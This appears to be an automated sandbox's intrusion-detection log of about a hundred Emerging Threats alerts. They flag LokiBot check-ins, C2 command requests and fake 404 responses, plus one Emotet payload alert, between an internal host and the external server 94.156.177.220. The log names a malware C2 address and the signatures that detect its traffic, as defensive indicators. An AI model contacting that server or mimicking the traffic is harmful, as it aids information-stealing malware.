                                                                                    2024-10-24T08:46:58.242857+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922194.156.177.22080TCP
                                                                                    2024-10-24T08:46:59.198997+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922194.156.177.22080TCP
                                                                                    2024-10-24T08:46:59.198997+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922194.156.177.22080TCP
                                                                                    2024-10-24T08:46:59.204710+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249221TCP
                                                                                    2024-10-24T08:46:59.354586+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922294.156.177.22080TCP
                                                                                    2024-10-24T08:46:59.354586+02002025381ET MALWARE LokiBot Checkin1192.168.2.224922294.156.177.22080TCP
                                                                                    2024-10-24T08:46:59.354586+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922294.156.177.22080TCP
                                                                                    2024-10-24T08:47:00.299934+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922294.156.177.22080TCP
                                                                                    2024-10-24T08:47:00.299934+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922294.156.177.22080TCP
                                                                                    2024-10-24T08:47:00.305973+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249222TCP
                                                                                    2024-10-24T08:47:00.514142+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922394.156.177.22080TCP
                                                                                    2024-10-24T08:47:00.514142+02002025381ET MALWARE LokiBot Checkin1192.168.2.224922394.156.177.22080TCP
                                                                                    2024-10-24T08:47:00.514142+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922394.156.177.22080TCP
                                                                                    2024-10-24T08:47:01.467081+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922394.156.177.22080TCP
                                                                                    2024-10-24T08:47:01.467081+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922394.156.177.22080TCP
                                                                                    2024-10-24T08:47:01.472717+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249223TCP
                                                                                    2024-10-24T08:47:02.970814+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922494.156.177.22080TCP
                                                                                    2024-10-24T08:47:02.970814+02002025381ET MALWARE LokiBot Checkin1192.168.2.224922494.156.177.22080TCP
                                                                                    2024-10-24T08:47:02.970814+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922494.156.177.22080TCP
                                                                                    2024-10-24T08:47:03.911969+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922494.156.177.22080TCP
                                                                                    2024-10-24T08:47:03.911969+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922494.156.177.22080TCP
                                                                                    2024-10-24T08:47:03.917655+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249224TCP
                                                                                    2024-10-24T08:47:04.071738+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922594.156.177.22080TCP
                                                                                    2024-10-24T08:47:04.071738+02002025381ET MALWARE LokiBot Checkin1192.168.2.224922594.156.177.22080TCP
                                                                                    2024-10-24T08:47:04.071738+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922594.156.177.22080TCP
                                                                                    2024-10-24T08:47:05.015239+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922594.156.177.22080TCP
                                                                                    2024-10-24T08:47:05.015239+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922594.156.177.22080TCP
                                                                                    2024-10-24T08:47:05.022620+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249225TCP
                                                                                    2024-10-24T08:47:05.171077+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922694.156.177.22080TCP
                                                                                    2024-10-24T08:47:05.171077+02002025381ET MALWARE LokiBot Checkin1192.168.2.224922694.156.177.22080TCP
                                                                                    2024-10-24T08:47:05.171077+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922694.156.177.22080TCP
                                                                                    2024-10-24T08:47:06.127566+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922694.156.177.22080TCP
                                                                                    2024-10-24T08:47:06.127566+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922694.156.177.22080TCP
                                                                                    2024-10-24T08:47:06.133237+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249226TCP
                                                                                    2024-10-24T08:47:06.288133+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922794.156.177.22080TCP
                                                                                    2024-10-24T08:47:06.288133+02002025381ET MALWARE LokiBot Checkin1192.168.2.224922794.156.177.22080TCP
                                                                                    2024-10-24T08:47:06.288133+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922794.156.177.22080TCP
                                                                                    2024-10-24T08:47:07.235602+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922794.156.177.22080TCP
                                                                                    2024-10-24T08:47:07.235602+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922794.156.177.22080TCP
                                                                                    2024-10-24T08:47:07.249824+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249227TCP
                                                                                    2024-10-24T08:47:07.393228+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922894.156.177.22080TCP
                                                                                    2024-10-24T08:47:07.393228+02002025381ET MALWARE LokiBot Checkin1192.168.2.224922894.156.177.22080TCP
                                                                                    2024-10-24T08:47:07.393228+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922894.156.177.22080TCP
                                                                                    2024-10-24T08:47:08.350903+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922894.156.177.22080TCP
                                                                                    2024-10-24T08:47:08.350903+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922894.156.177.22080TCP
                                                                                    2024-10-24T08:47:08.358221+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249228TCP
                                                                                    2024-10-24T08:47:08.518293+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922994.156.177.22080TCP
                                                                                    2024-10-24T08:47:08.518293+02002025381ET MALWARE LokiBot Checkin1192.168.2.224922994.156.177.22080TCP
                                                                                    2024-10-24T08:47:08.518293+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922994.156.177.22080TCP
                                                                                    2024-10-24T08:47:09.473326+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922994.156.177.22080TCP
                                                                                    2024-10-24T08:47:09.473326+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922994.156.177.22080TCP
                                                                                    2024-10-24T08:47:09.479147+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249229TCP
                                                                                    2024-10-24T08:47:09.627438+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923094.156.177.22080TCP
                                                                                    2024-10-24T08:47:09.627438+02002025381ET MALWARE LokiBot Checkin1192.168.2.224923094.156.177.22080TCP
                                                                                    2024-10-24T08:47:09.627438+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923094.156.177.22080TCP
                                                                                    2024-10-24T08:47:10.574642+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923094.156.177.22080TCP
                                                                                    2024-10-24T08:47:10.574642+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923094.156.177.22080TCP
                                                                                    2024-10-24T08:47:10.580452+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249230TCP
                                                                                    2024-10-24T08:47:10.737748+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923194.156.177.22080TCP
                                                                                    2024-10-24T08:47:10.737748+02002025381ET MALWARE LokiBot Checkin1192.168.2.224923194.156.177.22080TCP
                                                                                    2024-10-24T08:47:10.737748+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923194.156.177.22080TCP
                                                                                    2024-10-24T08:47:11.695700+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923194.156.177.22080TCP
                                                                                    2024-10-24T08:47:11.695700+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923194.156.177.22080TCP
                                                                                    2024-10-24T08:47:11.701224+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249231TCP
                                                                                    2024-10-24T08:47:11.855700+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923294.156.177.22080TCP
                                                                                    2024-10-24T08:47:11.855700+02002025381ET MALWARE LokiBot Checkin1192.168.2.224923294.156.177.22080TCP
                                                                                    2024-10-24T08:47:11.855700+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923294.156.177.22080TCP
                                                                                    2024-10-24T08:47:12.799153+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923294.156.177.22080TCP
                                                                                    2024-10-24T08:47:12.799153+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923294.156.177.22080TCP
                                                                                    2024-10-24T08:47:12.804788+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249232TCP
                                                                                    2024-10-24T08:47:12.955608+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923394.156.177.22080TCP
                                                                                    2024-10-24T08:47:12.955608+02002025381ET MALWARE LokiBot Checkin1192.168.2.224923394.156.177.22080TCP
                                                                                    2024-10-24T08:47:12.955608+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923394.156.177.22080TCP
                                                                                    2024-10-24T08:47:14.031658+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923394.156.177.22080TCP
                                                                                    2024-10-24T08:47:14.031658+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923394.156.177.22080TCP
                                                                                    2024-10-24T08:47:14.038314+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249233TCP
                                                                                    2024-10-24T08:47:14.230832+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923494.156.177.22080TCP
                                                                                    2024-10-24T08:47:14.230832+02002025381ET MALWARE LokiBot Checkin1192.168.2.224923494.156.177.22080TCP
                                                                                    2024-10-24T08:47:14.230832+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923494.156.177.22080TCP
                                                                                    2024-10-24T08:47:15.182608+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923494.156.177.22080TCP
                                                                                    2024-10-24T08:47:15.182608+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923494.156.177.22080TCP
                                                                                    2024-10-24T08:47:15.188153+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249234TCP
                                                                                    2024-10-24T08:47:15.332422+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923594.156.177.22080TCP
                                                                                    2024-10-24T08:47:15.332422+02002025381ET MALWARE LokiBot Checkin1192.168.2.224923594.156.177.22080TCP
                                                                                    2024-10-24T08:47:15.332422+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923594.156.177.22080TCP
                                                                                    2024-10-24T08:47:16.271864+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923594.156.177.22080TCP
                                                                                    2024-10-24T08:47:16.271864+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923594.156.177.22080TCP
                                                                                    2024-10-24T08:47:16.278079+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249235TCP
                                                                                    2024-10-24T08:47:16.428303+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923694.156.177.22080TCP
                                                                                    2024-10-24T08:47:16.428303+02002025381ET MALWARE LokiBot Checkin1192.168.2.224923694.156.177.22080TCP
                                                                                    2024-10-24T08:47:16.428303+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923694.156.177.22080TCP
                                                                                    2024-10-24T08:47:17.383378+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923694.156.177.22080TCP
                                                                                    2024-10-24T08:47:17.383378+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923694.156.177.22080TCP
                                                                                    2024-10-24T08:47:17.389330+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249236TCP
                                                                                    2024-10-24T08:47:17.547052+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923794.156.177.22080TCP
                                                                                    2024-10-24T08:47:17.547052+02002025381ET MALWARE LokiBot Checkin1192.168.2.224923794.156.177.22080TCP
                                                                                    2024-10-24T08:47:17.547052+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923794.156.177.22080TCP
                                                                                    2024-10-24T08:47:18.474819+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923794.156.177.22080TCP
                                                                                    2024-10-24T08:47:18.474819+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923794.156.177.22080TCP
                                                                                    2024-10-24T08:47:18.480750+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249237TCP
                                                                                    2024-10-24T08:47:18.627837+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923894.156.177.22080TCP
                                                                                    2024-10-24T08:47:18.627837+02002025381ET MALWARE LokiBot Checkin1192.168.2.224923894.156.177.22080TCP
                                                                                    2024-10-24T08:47:18.627837+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923894.156.177.22080TCP
                                                                                    2024-10-24T08:47:19.574207+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923894.156.177.22080TCP
                                                                                    2024-10-24T08:47:19.574207+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923894.156.177.22080TCP
                                                                                    2024-10-24T08:47:19.581057+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249238TCP
                                                                                    2024-10-24T08:47:19.754722+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923994.156.177.22080TCP
                                                                                    2024-10-24T08:47:19.754722+02002025381ET MALWARE LokiBot Checkin1192.168.2.224923994.156.177.22080TCP
                                                                                    2024-10-24T08:47:19.754722+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923994.156.177.22080TCP
                                                                                    2024-10-24T08:47:20.702266+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923994.156.177.22080TCP
                                                                                    2024-10-24T08:47:20.702266+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923994.156.177.22080TCP
                                                                                    2024-10-24T08:47:20.708039+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249239TCP
                                                                                    2024-10-24T08:47:20.851688+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924094.156.177.22080TCP
                                                                                    2024-10-24T08:47:20.851688+02002025381ET MALWARE LokiBot Checkin1192.168.2.224924094.156.177.22080TCP
                                                                                    2024-10-24T08:47:20.851688+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924094.156.177.22080TCP
                                                                                    2024-10-24T08:47:21.798439+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924094.156.177.22080TCP
                                                                                    2024-10-24T08:47:21.798439+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924094.156.177.22080TCP
                                                                                    2024-10-24T08:47:21.804175+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249240TCP
                                                                                    2024-10-24T08:47:22.015332+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924194.156.177.22080TCP
                                                                                    2024-10-24T08:47:22.015332+02002025381ET MALWARE LokiBot Checkin1192.168.2.224924194.156.177.22080TCP
                                                                                    2024-10-24T08:47:22.015332+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924194.156.177.22080TCP
                                                                                    2024-10-24T08:47:22.966218+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924194.156.177.22080TCP
                                                                                    2024-10-24T08:47:22.966218+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924194.156.177.22080TCP
                                                                                    2024-10-24T08:47:22.972650+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249241TCP
                                                                                    2024-10-24T08:47:23.119040+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924294.156.177.22080TCP
                                                                                    2024-10-24T08:47:23.119040+02002025381ET MALWARE LokiBot Checkin1192.168.2.224924294.156.177.22080TCP
                                                                                    2024-10-24T08:47:23.119040+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924294.156.177.22080TCP
                                                                                    2024-10-24T08:47:24.081988+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924294.156.177.22080TCP
                                                                                    2024-10-24T08:47:24.081988+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924294.156.177.22080TCP
                                                                                    2024-10-24T08:47:24.087813+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249242TCP
                                                                                    2024-10-24T08:47:24.247331+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924394.156.177.22080TCP
                                                                                    2024-10-24T08:47:24.247331+02002025381ET MALWARE LokiBot Checkin1192.168.2.224924394.156.177.22080TCP
                                                                                    2024-10-24T08:47:24.247331+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924394.156.177.22080TCP
                                                                                    2024-10-24T08:47:25.191206+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924394.156.177.22080TCP
                                                                                    2024-10-24T08:47:25.191206+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924394.156.177.22080TCP
                                                                                    2024-10-24T08:47:25.198524+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249243TCP
                                                                                    2024-10-24T08:47:25.347820+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924494.156.177.22080TCP
                                                                                    2024-10-24T08:47:25.347820+02002025381ET MALWARE LokiBot Checkin1192.168.2.224924494.156.177.22080TCP
                                                                                    2024-10-24T08:47:25.347820+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924494.156.177.22080TCP
                                                                                    2024-10-24T08:47:26.304249+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924494.156.177.22080TCP
                                                                                    2024-10-24T08:47:26.304249+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924494.156.177.22080TCP
                                                                                    2024-10-24T08:47:26.310070+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249244TCP
                                                                                    2024-10-24T08:47:26.454873+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924594.156.177.22080TCP
                                                                                    2024-10-24T08:47:26.454873+02002025381ET MALWARE LokiBot Checkin1192.168.2.224924594.156.177.22080TCP
                                                                                    2024-10-24T08:47:26.454873+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924594.156.177.22080TCP
                                                                                    2024-10-24T08:47:27.421647+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924594.156.177.22080TCP
                                                                                    2024-10-24T08:47:27.421647+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924594.156.177.22080TCP
                                                                                    2024-10-24T08:47:27.427377+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249245TCP
                                                                                    2024-10-24T08:47:27.639729+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924694.156.177.22080TCP
                                                                                    2024-10-24T08:47:27.639729+02002025381ET MALWARE LokiBot Checkin1192.168.2.224924694.156.177.22080TCP
                                                                                    2024-10-24T08:47:27.639729+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924694.156.177.22080TCP
                                                                                    2024-10-24T08:47:28.598214+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924694.156.177.22080TCP
                                                                                    2024-10-24T08:47:28.598214+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924694.156.177.22080TCP
                                                                                    2024-10-24T08:47:28.606339+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249246TCP
                                                                                    2024-10-24T08:47:28.606339+02002035065ET MALWARE W32/Emotet.v4 Checkin Fake 404 Payload Response194.156.177.22080192.168.2.2249246TCP
                                                                                    2024-10-24T08:47:28.744434+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924794.156.177.22080TCP
                                                                                    2024-10-24T08:47:28.744434+02002025381ET MALWARE LokiBot Checkin1192.168.2.224924794.156.177.22080TCP
                                                                                    2024-10-24T08:47:28.744434+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924794.156.177.22080TCP
                                                                                    2024-10-24T08:47:29.692195+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924794.156.177.22080TCP
                                                                                    2024-10-24T08:47:29.692195+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924794.156.177.22080TCP
                                                                                    2024-10-24T08:47:29.699203+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249247TCP
                                                                                    2024-10-24T08:47:29.996929+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924894.156.177.22080TCP
                                                                                    2024-10-24T08:47:29.996929+02002025381ET MALWARE LokiBot Checkin1192.168.2.224924894.156.177.22080TCP
                                                                                    2024-10-24T08:47:29.996929+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924894.156.177.22080TCP
                                                                                    2024-10-24T08:47:30.943851+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924894.156.177.22080TCP
                                                                                    2024-10-24T08:47:30.943851+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924894.156.177.22080TCP
                                                                                    2024-10-24T08:47:30.950973+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249248TCP
                                                                                    2024-10-24T08:47:31.153128+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924994.156.177.22080TCP
                                                                                    2024-10-24T08:47:31.153128+02002025381ET MALWARE LokiBot Checkin1192.168.2.224924994.156.177.22080TCP
                                                                                    2024-10-24T08:47:31.153128+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924994.156.177.22080TCP
                                                                                    2024-10-24T08:47:32.217248+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924994.156.177.22080TCP
                                                                                    2024-10-24T08:47:32.217248+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924994.156.177.22080TCP
                                                                                    2024-10-24T08:47:32.223424+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249249TCP
                                                                                    2024-10-24T08:47:32.364981+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224925094.156.177.22080TCP
                                                                                    2024-10-24T08:47:32.364981+02002025381ET MALWARE LokiBot Checkin1192.168.2.224925094.156.177.22080TCP
                                                                                    2024-10-24T08:47:32.364981+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224925094.156.177.22080TCP
                                                                                    2024-10-24T08:47:33.316783+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224925094.156.177.22080TCP
                                                                                    2024-10-24T08:47:33.316783+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224925094.156.177.22080TCP
                                                                                    2024-10-24T08:47:33.322651+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249250TCP
                                                                                    2024-10-24T08:47:33.527794+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224925194.156.177.22080TCP
                                                                                    2024-10-24T08:47:33.527794+02002025381ET MALWARE LokiBot Checkin1192.168.2.224925194.156.177.22080TCP
                                                                                    2024-10-24T08:47:33.527794+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224925194.156.177.22080TCP
                                                                                    2024-10-24T08:47:34.466932+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224925194.156.177.22080TCP
                                                                                    2024-10-24T08:47:34.466932+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224925194.156.177.22080TCP
                                                                                    2024-10-24T08:47:34.472518+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249251TCP
                                                                                    2024-10-24T08:47:34.612892+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224925294.156.177.22080TCP
                                                                                    2024-10-24T08:47:34.612892+02002025381ET MALWARE LokiBot Checkin1192.168.2.224925294.156.177.22080TCP
                                                                                    2024-10-24T08:47:34.612892+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224925294.156.177.22080TCP
                                                                                    2024-10-24T08:47:36.171721+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224925294.156.177.22080TCP
                                                                                    2024-10-24T08:47:36.171721+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224925294.156.177.22080TCP
                                                                                    2024-10-24T08:47:36.171800+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249252TCP
                                                                                    2024-10-24T08:47:36.386309+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224925394.156.177.22080TCP
                                                                                    2024-10-24T08:47:36.386309+02002025381ET MALWARE LokiBot Checkin1192.168.2.224925394.156.177.22080TCP
                                                                                    2024-10-24T08:47:36.386309+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224925394.156.177.22080TCP
                                                                                    2024-10-24T08:47:37.350269+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224925394.156.177.22080TCP
                                                                                    2024-10-24T08:47:37.350269+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224925394.156.177.22080TCP
                                                                                    2024-10-24T08:47:37.356119+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249253TCP
                                                                                    2024-10-24T08:47:37.498724+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224925494.156.177.22080TCP
                                                                                    2024-10-24T08:47:37.498724+02002025381ET MALWARE LokiBot Checkin1192.168.2.224925494.156.177.22080TCP
                                                                                    2024-10-24T08:47:37.498724+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224925494.156.177.22080TCP
                                                                                    2024-10-24T08:47:38.481255+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224925494.156.177.22080TCP
                                                                                    2024-10-24T08:47:38.481255+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224925494.156.177.22080TCP
                                                                                    2024-10-24T08:47:38.486944+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249254TCP
                                                                                    2024-10-24T08:47:38.645072+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224925594.156.177.22080TCP
                                                                                    2024-10-24T08:47:38.645072+02002025381ET MALWARE LokiBot Checkin1192.168.2.224925594.156.177.22080TCP
                                                                                    2024-10-24T08:47:38.645072+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224925594.156.177.22080TCP
                                                                                    2024-10-24T08:47:39.590691+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224925594.156.177.22080TCP
                                                                                    2024-10-24T08:47:39.590691+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224925594.156.177.22080TCP
                                                                                    2024-10-24T08:47:39.597242+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249255TCP
                                                                                    2024-10-24T08:47:39.740085+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224925694.156.177.22080TCP
                                                                                    2024-10-24T08:47:39.740085+02002025381ET MALWARE LokiBot Checkin1192.168.2.224925694.156.177.22080TCP
                                                                                    2024-10-24T08:47:39.740085+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224925694.156.177.22080TCP
                                                                                    2024-10-24T08:47:40.694535+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224925694.156.177.22080TCP
                                                                                    2024-10-24T08:47:40.694535+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224925694.156.177.22080TCP
                                                                                    2024-10-24T08:47:40.700210+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249256TCP
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Oct 24, 2024 08:45:22.450385094 CEST49163443192.168.2.225.159.62.244
